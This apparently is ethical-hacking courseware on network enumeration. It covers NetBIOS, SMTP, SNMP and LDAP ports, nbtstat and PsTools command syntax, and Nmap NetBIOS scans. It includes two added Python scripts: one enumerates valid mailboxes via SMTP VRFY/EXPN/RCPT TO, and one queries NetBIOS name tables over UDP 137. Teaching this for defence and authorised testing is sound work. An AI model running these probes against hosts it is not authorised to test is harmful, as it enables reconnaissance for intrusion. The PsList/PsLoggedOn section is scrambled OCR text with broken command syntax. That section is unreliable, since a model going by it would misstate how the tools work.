▪ UDP 137: NetBIOS Name Service (NBNS)
NBNS, also known as the Windows Internet Name Service (WINS), provides a name resolution service for computers running NetBIOS. NetBIOS name servers maintain a database of the NetBIOS names for hosts and the corresponding IP address the host is using. NBNS aims to match IP addresses with NetBIOS names and queries. Attackers usually attack the name service first. Typically, NBNS uses UDP 137 as its transport protocol. It can also use TCP 137 as its transport protocol for a few operations, though this might never occur in practice.
▪ TCP 139: NetBIOS Session Service (SMB over NetBIOS)
TCP 139 is perhaps the most well-known Windows port. It is used to transfer files over a network. Systems use this port for both null-session establishment as well as file and printer sharing. A system administrator considering the restriction of access to ports on a Windows system should make the restriction of TCP 139 a top priority. An improperly configured TCP 139 port can allow an intruder to gain unauthorized access to critical system files or the complete file system, resulting in data theft or other malicious activities.
▪ TCP/UDP 445: SMB over TCP (Direct Host)
Windows supports file- and printer-sharing traffic using the SMB protocol hosted directly on TCP. In earlier OSs, SMB traffic over TCP required the NetBIOS over TCP/IP (NBT) protocol to work on a TCP/IP transport. Directly hosted SMB traffic uses port 445 (TCP and UDP) instead of NetBIOS.
▪ UDP 161: Simple Network Management Protocol (SNMP)
SNMP is widely used in network management systems to monitor network-attached devices such as routers, switches, firewalls, printers, and servers. It consists of a manager and agents. The agent receives requests from the managers on port 161 and answers them on the same exchange; unsolicited notifications (traps) from the agent are sent to the manager on port 162.
▪ TCP/UDP 389: Lightweight Directory Access Protocol (LDAP)
LDAP is a protocol for accessing and maintaining distributed directory information services over an IP network. By default, LDAP uses TCP or UDP as its transport protocol over port 389.
▪ TCP 2049: Network File System (NFS)
The NFS protocol is used to mount file systems on a remote host over a network, and users can interact with the file systems as if they are mounted locally. NFS servers listen to their client systems on TCP port 2049. If NFS services are not properly configured, then attackers may exploit the NFS protocol to gain control over a remote system, perform privilege escalation, inject backdoors or malware on a remote host, etc.
▪ TCP 25: Simple Mail Transfer Protocol (SMTP)
SMTP is a TCP/IP mail delivery protocol. It transfers email across the Internet and across local networks. It runs on the connection-oriented service provided by TCP and uses the well-known port number 25. The table below lists some commands used by SMTP and their respective syntaxes.

Command     Syntax
Hello       HELO <domain>
From        MAIL FROM: <reverse-path>
Recipient   RCPT TO: <forward-path>
Data        DATA
Reset       RSET
Verify      VRFY <string>
Expand      EXPN <string>
Help        HELP [<string>]
Quit        QUIT
Table 4.1: SMTP commands and their respective syntaxes

▪ TCP/UDP 162: SNMP Trap
An SNMP trap uses TCP/UDP port 162 to send notifications such as optional variable bindings and the sysUpTime value from an agent to a manager.
▪ UDP 500: Internet Security Association and Key Management Protocol (ISAKMP)/Internet Key Exchange (IKE)
Internet Security Association and Key Management Protocol (ISAKMP)/Internet Key Exchange (IKE) is a protocol used to set up a security association (SA) in the IPsec protocol suite. It uses UDP port 500 to establish, negotiate, modify, and delete SAs and cryptographic keys in a virtual private network (VPN) environment.
▪ TCP 22: Secure Shell (SSH)
Secure Shell (SSH) is a command-level protocol mainly used for managing various networked devices securely. It is generally used as an alternative to the unsecure Telnet protocol. SSH uses the client/server communication model, and the SSH server, by default, listens to its client on TCP port 22. Attackers may exploit the SSH protocol by brute-forcing SSH login credentials.
▪ TCP/UDP 3268: Global Catalog Service
Microsoft's Global Catalog server, a domain controller that stores extra information, uses port 3268. Its database contains rows for every object in the entire organization, instead of rows for only the objects in one domain. Global Catalog allows one to locate objects from any domain without having to know the domain name. LDAP in the Global Catalog server uses port 3268. This service listens to port 3268 through a TCP connection. Administrators use port 3268 for troubleshooting issues in the Global Catalog by connecting to it using LDP.
▪ TCP/UDP 5060, 5061: Session Initiation Protocol (SIP)
The Session Initiation Protocol (SIP) is a protocol used in Internet telephony for voice and video calls. It typically uses TCP/UDP port 5060 (non-encrypted signaling traffic) or 5061 (encrypted traffic with TLS) for SIP to servers and other endpoints.
▪ TCP 20/21: File Transfer Protocol (FTP)
FTP is a connection-oriented protocol used for transferring files over the Internet and private networks. FTP is controlled on TCP port 21, and for data transmission, FTP uses TCP port 20 or some dynamic port numbers depending on the server configuration. If attackers identify that FTP server ports are open, then they perform enumeration on FTP to find information such as the software version and state of existing vulnerabilities to perform further exploitations such as the sniffing of FTP traffic and FTP brute-force attacks.
▪ TCP 23: Telnet
The Telnet protocol is used for managing various networked devices remotely. It is an unsecure protocol because it transmits login credentials in cleartext format. Therefore, it is mostly used in private networks. The Telnet server listens to its clients on port 23. Attackers can take advantage of the Telnet protocol to perform banner grabbing on other protocols such as SSH and SMTP, brute-forcing attacks on login credentials, port-forwarding attacks, etc.
▪ UDP 69: Trivial File Transfer Protocol (TFTP)
TFTP is a connectionless protocol used for transferring files over the Internet. TFTP depends on connectionless UDP; therefore, it does not guarantee the proper transmission of the file to the destination. TFTP is mainly used to update or upgrade software and firmware on remote networked devices. It uses UDP port 69 for transferring files to a remote host. Attackers may exploit TFTP to install malicious software or firmware on remote devices.
▪ TCP 179: Border Gateway Protocol (BGP)
BGP is widely used by Internet service providers (ISPs) to maintain huge routing tables and for efficiently processing Internet traffic. BGP routers establish sessions on TCP port 179. The misconfiguration of BGP may lead to various attacks such as dictionary attacks, resource-exhaustion attacks, flooding attacks, and hijacking attacks.
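How the SMTP commands of Table 4.1 are turned into user enumeration on TCP 25, as an added example that is not part of the courseware: VRFY and EXPN answer 250 for a mailbox the server knows and 550 for one it does not, and when VRFY is disabled (252 or 502) the same question can be asked with MAIL FROM / RCPT TO. The FakeSmtpServer class, the domain example.test, and the candidate names alice, bob and carol are constructed stand-ins so the logic runs offline; against a real host, pass smtp_connect(host) instead of the fake object.

```python
# Added example (not from the CEH courseware): enumerate valid mailboxes with the
# SMTP commands VRFY / EXPN / RCPT TO (see Table 4.1). FakeSmtpServer is a
# constructed stand-in for a loosely configured MTA so the code runs offline.
import socket


def smtp_connect(host, port=25, timeout=5.0):
    """Socket to a live SMTP server (network access required)."""
    return socket.create_connection((host, port), timeout=timeout)


class FakeSmtpServer:
    """Scripted responder: 250 for known users, 550 for unknown ones; with
    vrfy_enabled=False it answers VRFY with 252, like a hardened server."""

    def __init__(self, users, domain="example.test", vrfy_enabled=True):
        self.users, self.domain, self.vrfy_enabled = set(users), domain, vrfy_enabled
        self._out = b"220 %s ESMTP ready\r\n" % domain.encode()

    def sendall(self, data):
        cmd, _, arg = data.decode().strip().partition(" ")
        cmd = cmd.upper()
        user = arg.split(":")[-1].strip().strip("<>").split("@")[0]
        if cmd == "HELO":
            reply = "250 %s" % self.domain
        elif cmd in ("VRFY", "EXPN") and not self.vrfy_enabled:
            reply = "252 2.5.2 Cannot VRFY user, but will accept message"
        elif cmd in ("VRFY", "EXPN"):
            reply = "250 %s <%s@%s>" % (user, user, self.domain) if user in self.users else "550 5.1.1 User unknown"
        elif cmd == "RCPT":
            reply = "250 OK" if user in self.users else "550 5.1.1 Recipient rejected"
        elif cmd in ("MAIL", "RSET"):
            reply = "250 OK"
        elif cmd == "QUIT":
            reply = "221 Bye"
        else:
            reply = "502 Command not implemented"
        self._out += (reply + "\r\n").encode()

    def recv(self, n):
        data, self._out = self._out[:n], self._out[n:]
        return data


def read_reply(conn):
    """Read one (possibly multi-line) SMTP reply and return its 3-digit code."""
    buf = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("connection closed")
        buf += chunk
        lines = buf.split(b"\r\n")
        # complete when the last line reads 'NNN ' (a dash after the code means more lines follow)
        if buf.endswith(b"\r\n") and len(lines[-2]) >= 4 and lines[-2][3:4] == b" ":
            return int(lines[-2][:3])


def enumerate_users(conn, candidates, domain="example.test"):
    """Return the candidate names the server confirms. VRFY is tried first; a
    252/502 switches the remaining probes to MAIL FROM / RCPT TO."""
    if read_reply(conn) != 220:
        raise RuntimeError("no SMTP banner")
    conn.sendall(b"HELO scanner.local\r\n")
    read_reply(conn)
    found, use_rcpt = [], False
    for user in candidates:
        if not use_rcpt:
            conn.sendall(b"VRFY %s\r\n" % user.encode())
            code = read_reply(conn)
            if code in (252, 502):            # VRFY disabled or non-committal
                use_rcpt = True
            else:
                if code == 250:
                    found.append(user)
                continue
        conn.sendall(b"MAIL FROM:<probe@scanner.local>\r\n")
        read_reply(conn)
        conn.sendall(b"RCPT TO:<%s@%s>\r\n" % (user.encode(), domain.encode()))
        if read_reply(conn) == 250:
            found.append(user)
        conn.sendall(b"RSET\r\n")             # clear the envelope before the next probe
        read_reply(conn)
    conn.sendall(b"QUIT\r\n")
    return found
```

The RCPT TO fallback is why disabling VRFY and EXPN alone is not a complete countermeasure: the server must also reject unknown recipients uniformly (or only after DATA) if it is not to confirm mailbox names one at a time.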
Module Flow: NetBIOS Enumeration | LDAP Enumeration | SMTP and DNS Enumeration | Enumeration Countermeasures

NetBIOS Enumeration
▪ NetBIOS names are a unique 16-ASCII-character string used to identify the network devices over TCP/IP; 15 characters are used for the device name, and the 16th character is reserved for the service or name record type

NetBIOS Enumeration (Cont'd)
▪ The nbtstat utility in Windows displays NetBIOS over TCP/IP (NetBT) protocol statistics, NetBIOS name tables for both the local and remote computers, and the NetBIOS name cache

NetBIOS Enumeration
Thus far, we discussed enumeration concepts and resources that provide valuable information. This section describes NetBIOS enumeration, the information obtained, and various NetBIOS enumeration tools. NetBIOS is considered first for enumeration because it extracts a large amount of sensitive information about the target network, such as users and network shares.

The first step in enumerating a Windows system is to take advantage of the NetBIOS API. NetBIOS was originally developed as an API for client software to access local area network (LAN) resources. Windows uses NetBIOS for file and printer sharing. The NetBIOS name is a unique 16-character ASCII string assigned to Windows systems to identify network devices over TCP/IP; 15 characters are used for the device name, and the 16th is reserved for the service or record type. NetBIOS uses UDP port 137 (name services), UDP port 138 (datagram services), and TCP port 139 (session services). Attackers usually target the NetBIOS service because it is easy to exploit and runs on Windows systems even when not in use.

Attackers use NetBIOS enumeration to obtain the following:
▪ The list of computers that belong to a domain
▪ The list of shares on the individual hosts in a network
▪ Policies and passwords

An attacker who finds a Windows system with port 139 open can check to see which resources can be accessed or viewed on a remote system. However, to enumerate the NetBIOS names, the remote system must have enabled file and printer sharing. NetBIOS enumeration may enable an attacker to read or write to a remote computer system, depending on the availability of shares, or launch a DoS attack.
Name          Number  Type    Usage
<host name>   <00>    UNIQUE  Hostname
<domain>      <00>    GROUP   Domain name
<host name>   <03>    UNIQUE  Messenger service running for the computer
<username>    <03>    UNIQUE  Messenger service running for the logged-in user
<host name>   <20>    UNIQUE  Server service running
<domain>      <1D>    UNIQUE  Master browser name for the subnet
<domain>      <1B>    UNIQUE  Domain master browser name, which identifies the primary domain controller (PDC) for the domain
<domain>      <1E>    GROUP   Browser service elections
Table 4.2: NetBIOS name list

Note that Microsoft does not support NetBIOS name resolution for IPv6.
Nbtstat Utility
Source: https://docs.microsoft.com
Nbtstat is a Windows utility that helps in troubleshooting NETBIOS name resolution problems. The nbtstat command removes and corrects preloaded entries using several case-sensitive switches. Attackers use Nbtstat to enumerate information such as NetBIOS over TCP/IP (NetBT) protocol statistics, NetBIOS name tables for both local and remote computers, and the NetBIOS name cache.
The syntax of the nbtstat command is as follows:
nbtstat [-a RemoteName] [-A IP Address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]
The table shown below lists various Nbtstat parameters and their respective functions.

Parameter       Function
-a RemoteName   Displays the NetBIOS name table of a remote computer, where RemoteName is the NetBIOS computer name of the remote computer
-A IP Address   Displays the NetBIOS name table of a remote computer, specified by the IP address (in dotted decimal notation) of the remote computer
-c              Lists the contents of the NetBIOS name cache, the table of NetBIOS names and their resolved IP addresses
-n              Displays the names registered locally by NetBIOS applications such as the server and redirector
-r              Displays a count of all names resolved by a broadcast or WINS server
-R              Purges the name cache and reloads all #PRE-tagged entries from the Lmhosts file
-RR             Releases and re-registers all names with the name server
-s              Lists the NetBIOS sessions table, converting destination IP addresses to computer NetBIOS names
-S              Lists the current NetBIOS sessions and their status with the IP addresses
Interval        Re-displays selected statistics, pausing at each display for the number of seconds specified in Interval
Table 4.3: Nbtstat parameters and their respective functions

The following are some examples for nbtstat commands.
▪ The nbtstat command "nbtstat -A <IP address of the remote machine>" (or "nbtstat -a <NetBIOS name of the remote machine>" when the target is known by name) can be executed to obtain the NetBIOS name table of a remote computer.

Figure 4.1: Nbtstat command to obtain the NetBIOS name table of a remote computer

▪ The nbtstat command "nbtstat -c" can be executed to obtain the contents of the NetBIOS name cache, the table of NetBIOS names, and their resolved IP addresses.

Figure 4.2: Nbtstat command to obtain the contents of the NetBIOS name cache
NetBIOS Enumeration Tools
NetBIOS enumeration tools explore and scan a network within a given range of IP addresses and lists of computers to identify security loopholes or flaws in networked systems. These tools also enumerate operating systems (OSs), users, groups, Security Identifiers (SIDs), password policies, services, service packs and hotfixes, NetBIOS shares, transports, sessions, disks and security event logs, etc.
▪ NetBIOS Enumerator
Source: http://nbtenum.sourceforge.net
NetBIOS Enumerator is an enumeration tool that shows how to use remote network support and to deal with some other web protocols, such as SMB. As shown in the screenshot, attackers use NetBIOS Enumerator to enumerate details such as NetBIOS names, usernames, domain names, and media access control (MAC) addresses for a given range of IP addresses.

Figure 4.3: Screenshot of NetBIOS Enumerator

▪ Nmap
Source: https://nmap.org
Attackers use the Nmap Scripting Engine (NSE) for discovering NetBIOS shares on a network. The nbstat script of NSE allows attackers to retrieve the target's NetBIOS names and MAC addresses. By default, the script displays the name of the computer and the logged-in user. However, if the verbosity is turned up (-v), it displays all names related to that system.
As shown in the screenshot, an attacker uses the following Nmap command to perform NetBIOS enumeration on a target host:
nmap --script nbstat.nse <target IP address>
Figure 4.4: Screenshot of the Nmap command for NetBIOS enumeration (nmap --script nbstat.nse 10.10.10.16; "Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-31 07:11 EDT", "Loaded 44 scripts for scanning", "Initiating ARP Ping Scan", "Scanning 10.10.10.16 [1 port]")

Figure 4.5: Screenshot of Nmap NetBIOS enumeration output

The following are some additional NetBIOS enumeration tools:
▪ Global Network Inventory (http://www.magnetosoft.com)
▪ Advanced IP Scanner (http://www.advanced-ip-scanner.com)
▪ Hyena (https://www.systemtools.com)
▪ Nsauditor Network Security Auditor (https://www.nsauditor.com)
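What nbtstat -A and Nmap's nbstat.nse actually send and receive, as an added example that is not part of the courseware or of either tool: a NetBIOS node-status request for the wildcard name "*" goes to UDP 137, and the reply carries the name table of Table 4.2 (name, 16th-byte suffix, UNIQUE/GROUP flag) followed by the adapter's MAC address. The host SERVER2016, the domain CEH, and the MAC 00:0C:29:AA:BB:CC in sample_response() are constructed sample data so the parser can run offline; node_status() performs the live query.

```python
# Added example (not from the CEH courseware): NetBIOS node-status query to UDP 137
# (RFC 1002 NODE STATUS REQUEST/RESPONSE), the packet behind "nbtstat -A <ip>".
import socket
import struct

NBNS_PORT = 137
TYPE_NBSTAT, CLASS_IN = 0x0021, 0x0001
GROUP_FLAG = 0x8000

# (suffix, is_group) -> usage, from Table 4.2 plus the <1C> domain-controllers group name
SUFFIX_USAGE = {
    (0x00, False): "Workstation service (host name)",
    (0x00, True): "Domain name",
    (0x03, False): "Messenger service",
    (0x20, False): "Server service (file/printer sharing)",
    (0x1B, False): "Domain master browser (PDC)",
    (0x1C, True): "Domain controllers",
    (0x1D, False): "Master browser for the subnet",
    (0x1E, True): "Browser service elections",
}


def first_level_encode(raw16):
    """RFC 1001 first-level encoding: each nibble of the 16-byte name becomes a letter A..P."""
    assert len(raw16) == 16
    enc = bytes(0x41 + n for b in raw16 for n in (b >> 4, b & 0x0F))
    return bytes([32]) + enc + b"\x00"


def build_node_status_request(txid=0x1337):
    """The 50-byte query for the wildcard name '*' that asks a host for its whole name table."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = first_level_encode(b"*" + b"\x00" * 15) + struct.pack(">HH", TYPE_NBSTAT, CLASS_IN)
    return header + question


def parse_node_status_response(pkt):
    """Return (names, mac): names is a list of dicts, one per registered NetBIOS name."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or an != 1:
        raise ValueError("not a node status response")
    off = 12
    off += 1 + pkt[off] + 1                                # skip RR_NAME (length byte, label, terminator)
    rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    if rtype != TYPE_NBSTAT:
        raise ValueError("unexpected RR type 0x%04x" % rtype)
    num_names = pkt[off]
    off += 1
    names = []
    for _ in range(num_names):
        raw = pkt[off:off + 16]
        name_flags = struct.unpack(">H", pkt[off + 16:off + 18])[0]
        off += 18
        is_group, suffix = bool(name_flags & GROUP_FLAG), raw[15]
        names.append({
            "name": raw[:15].decode("ascii", "replace").rstrip(),
            "suffix": suffix,
            "type": "GROUP" if is_group else "UNIQUE",
            "usage": SUFFIX_USAGE.get((suffix, is_group), "Unknown"),
        })
    mac = ":".join("%02X" % b for b in pkt[off:off + 6])    # UNIT_ID, first field of STATISTICS
    return names, mac


def node_status(ip, timeout=2.0):
    """Send the query to a live host on UDP 137 (network access required)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(), (ip, NBNS_PORT))
        data, _ = s.recvfrom(1024)
    return parse_node_status_response(data)


def sample_response(txid=0x1337):
    """Constructed reply from a made-up host SERVER2016 in domain CEH (sample data, not a capture)."""
    entries = [(b"SERVER2016", 0x00, 0x0400), (b"CEH", 0x00, 0x8400),
               (b"SERVER2016", 0x20, 0x0400), (b"CEH", 0x1E, 0x8400)]   # 0x0400 = active, 0x8000 = group
    rdata = bytes([len(entries)])
    for name, suffix, name_flags in entries:
        rdata += name.ljust(15) + bytes([suffix]) + struct.pack(">H", name_flags)
    rdata += bytes.fromhex("000C29AABBCC") + b"\x00" * 40   # MAC followed by zeroed statistics
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    rr = first_level_encode(b"*" + b"\x00" * 15) + struct.pack(">HHIH", TYPE_NBSTAT, CLASS_IN, 0, len(rdata))
    return header + rr + rdata
```

The 16th byte is the part worth reading: a <20> entry tells you the Server service (file and printer sharing) is up, and <1B>/<1C> entries point at domain controllers, which is the triage nbtstat and nbstat.nse output is used for.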
Enumerating User Accounts
Source: https://docs.microsoft.com
Enumerating user accounts using the PsTools suite helps in controlling and managing remote systems from the command line. The following are some commands for enumerating user accounts.
▪ PsExec
PsExec is a lightweight Telnet replacement that can execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. PsExec's most powerful use is the launch of interactive command prompts on remote systems and remote-enabling tools such as Ipconfig that otherwise cannot show information about remote systems. The syntax of the PsExec command is as follows:
psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-r servicename][-h][-l][-s|-e][-x][-i [session]][-c executable [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
▪ PsFile
PsFile is a command-line utility that shows a list of files on a system that are opened remotely, and it can close opened files either by name or by a file identifier. The default behavior of PsFile is to list the files on the local system that are opened by remote systems. Typing a command followed by "-" displays information on the syntax for that command. The syntax of the PsFile command is as follows:
psfile [\\RemoteComputer [-u Username [-p Password]]] [[Id | path] [-c]]
- PsGetSid

PsGetSid translates SIDs to their display name and vice versa. It works on built-in accounts, domain accounts, and local accounts. It also displays the SIDs of user accounts and translates an SID into the name that represents it. It works across the network to query SIDs remotely. The syntax of the PsGetSid command is as follows:

psgetsid [\\computer[,computer[,...] | @file] [-u username [-p password]]] [account|SID]

- PsKill

PsKill is a kill utility that can kill processes on remote systems and terminate processes on the local computer. Running PsKill with a process ID directs it to kill the process of that ID on the local computer. If a process name is specified, PsKill will kill all processes that have that name. One need not install a client on the target computer to use PsKill to terminate a remote process. The syntax of the PsKill command is as follows:

pskill [- ] [-t] [\\computer [-u username] [-p password]] <process name | process id>
- PsInfo

PsInfo is a command-line tool that gathers key information about local or remote legacy Windows NT/2000 systems, including the type of installation, kernel build, registered organization and owner, number of processors and their type, amount of physical memory, installation date of the system, and expiration date in the case of a trial version. By default, PsInfo shows information for the local system. A remote computer name can be specified to obtain information for a remote system. The syntax of the PsInfo command is as follows:

psinfo [[\\computer[,computer[,...] | @file [-u user [-p psswd]]] [-h] [-s] [-d] [-c [-t delimiter]] [filter]
PsList
PsListis a command-linetool that displays unit (CPU)
centralprocessing and memory
informationor thread statistics.Toolsin the ResourceKits,pstatand pmon,show
differenttypesof dataonly
PsLoggedOn
for
the processeson the system
on whichthe toolsare run.

PsLoggedOn
is an applet
thatdisplays
boththe locally
logged-in
usersanduserslogged
in

intIfhe
via resources for eitherthe localcomputer or a remote one. a username is specified
insteadof acomputer,

that hasa profile


‘one
PsLoggedOn
andrevealsif the user currently searches
the
computers
logged network
in. PsLoggedOn
loadedinto the registry.
definesa locally
Therefore,PsLoggedOn
neighborhood
logged-in
user is
determineswho is
logged in byscanning the keys underthe HKEY_USERS key.Foreachkeythat has aname
for user SID, PsLoggedOn looks up the corresponding username and displays it. To
determinewho logged into a computer via resource shares, PsLoggedOn uses the
NetSession€num API. Thesyntax of the PsLoggedOn commandis as follows:
psloggedon[- ] [-1] [-x] [\\computername
| usernai
- PsLogList

The elogdump utility dumps the contents of an Event Log on a local or remote computer. PsLogList is a clone of elogdump except that PsLogList can log in to remote systems in situations where the user's security credentials would not permit access to the Event Log, and PsLogList retrieves message strings from the computer on which the event log is stored. The default function of PsLogList is to display the contents of the System Event Log on the local computer with visually friendly formatting. The syntax of the PsLogList command is as follows:

psloglist [- ] [\\computer[,computer[,...] | @file [-u username [-p password]]] [-s [-t delimiter]] [-m #|-n #|-h #|-d #|-w][-c][-x][-r][-a mm/dd/yy][-b mm/dd/yy][-f filter] [-i ID[,ID[,...] | -e ID[,ID[,...]]] [-o event source[,event source][,..]] [-q event source[,event source][,..]] [-l event log file] <eventlog>
- PsPasswd

PsPasswd can change an account password on local or remote systems, and administrators can create batch files that run PsPasswd on the computers they manage to perform a mass change of the administrator password. PsPasswd uses Windows password reset APIs; therefore, it does not send passwords over the network in cleartext. The syntax of the PsPasswd command is as follows:

pspasswd [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] Username [NewPassword]
- PsShutdown

PsShutdown can shut down or reboot a local or remote computer. It requires no manual installation of client software. The syntax of the PsShutdown command is as follows:

psshutdown [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] -s|-r|-h|-d|-k|-a|-l|-o [-f] [-c] [-t nn|h:m] [-n s] [-v nn] [-e [u|p]:xx:yy] [-m "message"]
Enumerating Shared Resources Using Net View

Net View is a command-line utility that displays a list of computers in a specified workgroup or the shared resources available on a specified computer. It can be used in the following ways.

net view \\<computername>

In the above command, <computername> is the name or IP address of a specific computer, the resources of which are to be displayed.

net view \\<computername> /ALL

The above command displays the shares on the specified remote computer, along with hidden shares.

net view /domain

The above command displays all the shares in the domain.

net view /domain:<domain name>

The above command displays all the shares on the specified domain.

The screenshot shows the shared resources available on the specified computer.

Figure 4.6: Output of Net View command
SNMP Enumeration

SNMP allows network administrators to manage network devices from a remote location. However, SNMP has many security vulnerabilities, such as a lack of auditing. Attackers may take advantage of these vulnerabilities to perform account and device enumeration. This section describes SNMP enumeration, the information extracted via SNMP enumeration, and various SNMP enumeration tools used to enumerate user accounts and devices on a target system.
SNMP is an application-layer protocol that runs on UDP and maintains and manages routers, hubs, and switches on an IP network. SNMP agents run on Windows and Unix networks on networking devices.

SNMP enumeration is the process of creating a list of the user's accounts and devices on a target computer using SNMP. SNMP employs two types of software components for communication: the SNMP agent and the SNMP management station. The SNMP agent is located on the networking device, and the SNMP management station communicates with the agent.

Almost all the network infrastructure devices such as routers and switches contain an SNMP agent for managing the system or devices. The SNMP management station sends requests to the agent; after receiving the request, the agent replies. Both requests and replies are configuration variables accessible by the agent software. SNMP management stations send requests to set values to some variables. Traps let the management station know if an abnormal event such as a reboot or an interface failure has occurred at the agent's side.

SNMP contains the following two passwords for configuring and accessing the SNMP agent from the management station.

- Read Community String
  - The configuration of the device or system can be viewed with the help of this password.
  - These strings are public.
- Read/Write Community String
  - The device configuration can be changed or edited using this password.
  - These strings are private.

When administrators leave the community strings at the default setting, attackers can use these default community strings (passwords) for changing or viewing the configuration of the device or system. Attackers enumerate SNMP to extract information about network resources such as hosts, routers, devices, and shares as well as network information such as ARP tables, routing tables, device-specific information, and traffic statistics.

Commonly used SNMP enumeration tools include OpUtils (https://www.manageengine.com) and Network Performance Monitor (https://www.solarwinds.com).
Working of SNMP

SNMP uses a distributed architecture comprising SNMP managers, SNMP agents, and several related components. The following are some commands associated with SNMP.

- GetRequest: Used by the SNMP manager to request information from an SNMP agent
- GetNextRequest: Used by the SNMP manager continuously to retrieve all the data stored in an array or table
- GetResponse: Used by an SNMP agent to satisfy a request made by the SNMP manager
- SetRequest: Used by the SNMP manager to modify the value of a parameter within an SNMP agent's management information base (MIB)
- Trap: Used by an SNMP agent to inform the pre-configured SNMP manager of a certain event

The communication process between an SNMP manager and an SNMP agent is as follows.

- The SNMP manager (Host X, 10.10.2.1) uses the GetRequest command to send a request for the number of active sessions to the SNMP agent (Host Y, 10.10.2.15). To perform this step, the SNMP manager uses an SNMP service library such as the Microsoft SNMP Management API library (Mgmtapi.dll) or the Microsoft WinSNMP API library (Wsnmp32.dll).
- The SNMP agent (Host Y) receives the message and verifies if the community string (CompInfo) is present on its MIB, checks the request against its list of access permissions for that community, and verifies the source IP address.
- If the SNMP agent does not find the community string or access permission in Host Y's MIB database and the SNMP service is set to send an authentication trap, it sends an authentication failure trap to the specified trap destination, Host Z.
- The master agent component of the SNMP agent calls the appropriate extension agent to retrieve the requested session information from the MIB.
- Using the session information retrieved from the extension agent, the SNMP service forms a return SNMP message that contains the number of active sessions and the destination IP address (10.10.2.1) of the SNMP manager, Host X.
- Host Y sends the response to Host X.

Figure 4.7: Illustration of the working of SNMP
Management Information Base (MIB)

MIB is a virtual database containing a formal description of all the network objects that SNMP manages. It is a collection of hierarchically organized information. It provides a standard representation of the SNMP agent's information and storage. MIB elements are recognized using object identifiers (OIDs). An OID is the numeric name given to an object and begins with the root of the MIB tree. The OID can uniquely identify the object in the MIB hierarchy. MIB-managed objects include scalar objects, which define a single object instance, and tabular objects, which define a group of related object instances. OIDs include the object's type (such as counter, string, or address), access level (such as read or read/write), size restrictions, and range information. The SNMP manager converts OIDs into a human-readable display using the MIB as a codebook.

A user can access the contents of the MIB by using a web browser either by entering the IP address and Lseries.mib or by entering the DNS library name and Lseries.mib. For example, http://IP.Address/Lseries.mib or http://library_name/Lseries.mib. Microsoft provides the list of MIBs that are installed with the SNMP service in the Windows resource kit. The major MIBs are as follows:

- DHCP.MIB: Monitors network traffic between DHCP servers and remote hosts
- HOSTMIB.MIB: Monitors and manages host resources
- LNMIB2.MIB: Contains object types for workstation and server services
- MIB_II.MIB: Manages TCP/IP-based Internet using a simple architecture and system
- WINS.MIB: For the Windows Internet Name Service (WINS)
SNMP Enumeration Tools

SNMP enumeration tools are used to scan a single IP address or a range of IP addresses of SNMP-enabled network devices to monitor, diagnose, and troubleshoot security threats.

- Snmpcheck (snmp_enum Module)

Source: http://www.nothink.org

Snmpcheck is an open-source tool distributed under the GNU General Public License (GPL). Its goal is to automate the process of gathering information on any device with SNMP support (Windows, Unix-like, network appliances, printers, etc.). Snmpcheck allows the enumeration of SNMP devices and places the output in a human-readable, user-friendly format. It could be useful for penetration testing or systems monitoring. Attackers use this tool to gather information about the target, such as contact, description, write access, devices, domain, hardware and storage information, hostname, Internet Information Services (IIS) statistics, IP forwarding, listening UDP ports, location, mount points, network interfaces, network services, routing information, software components, system uptime, TCP connections, total memory, uptime, and user accounts.

Figure 4.8: Screenshot of snmpcheck showing system information
- SoftPerfect Network Scanner

Source: https://www.softperfect.com

SoftPerfect Network Scanner can ping computers, scan ports, discover shared folders, and retrieve practically any information about network devices via Windows Management Instrumentation (WMI), SNMP, Hypertext Transfer Protocol (HTTP), SSH, and PowerShell. It also scans for remote services, registry, files, and performance counters; offers flexible filtering and display options; and exports NetScan results to a variety of formats ranging from Extensible Markup Language (XML) to JavaScript Object Notation (JSON). Moreover, SoftPerfect Network Scanner can check for a user-defined port and report if one is open. In addition, it can resolve hostnames and auto-detect the local and external IP range. It supports remote shutdown and Wake-on-LAN. Attackers use this tool to gather information about a shared folder and network devices.

Figure 4.10: Screenshot of SoftPerfect Network Scanner

The following are some additional SNMP enumeration tools:
- Network Performance Monitor (https://www.solarwinds.com)
- OpUtils (https://www.manageengine.com)
- PRTG Network Monitor (https://www.paessler.com)
- Engineer's Toolset (https://www.solarwinds.com)
LDAP Enumeration

Various protocols enable communication and manage data transfer between network resources. All these protocols carry valuable information about network resources along with the data. An external user who successfully enumerates that information by manipulating the protocols can break into the network and may misuse the network resources. The Lightweight Directory Access Protocol (LDAP) is one such protocol that accesses the directory listings. This section focuses on LDAP enumeration, the information extracted via LDAP enumeration, and LDAP enumeration tools.
LDAP is an Internet protocol for accessing distributed directory services. LDAP accesses directory listings within Active Directory or from other directory services. LDAP is a hierarchical or logical form of a directory, similar to a company's organizational chart. Directory services may provide any organized set of records, often in a hierarchical and logical structure, such as a corporate email directory. It uses DNS for quick lookups and fast resolution of queries. A client starts an LDAP session by connecting to a Directory System Agent (DSA), typically on TCP port 389, and sends an operation request to the DSA. The Basic Encoding Rules (BER) format is used to transmit information between the client and server.

An attacker can anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names, which an attacker can use to launch attacks.
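The SNMP exchange described in the "Working of SNMP" section and the LDAP session described above both carry their messages in BER, so one decoder serves both. The following is an added example, not code from the courseware: a minimal BER reader that reports an SNMPv1/v2c message's version, community string and PDU type (flagging the default public/private strings the SNMP section warns about) and, for LDAP, whether a BindRequest is an anonymous simple bind. The sample messages are constructed inline; the community name CompInfo comes from the page, while the OID 1.3.6.1.2.1.1.1.0 and the bind DN are assumptions.

```python
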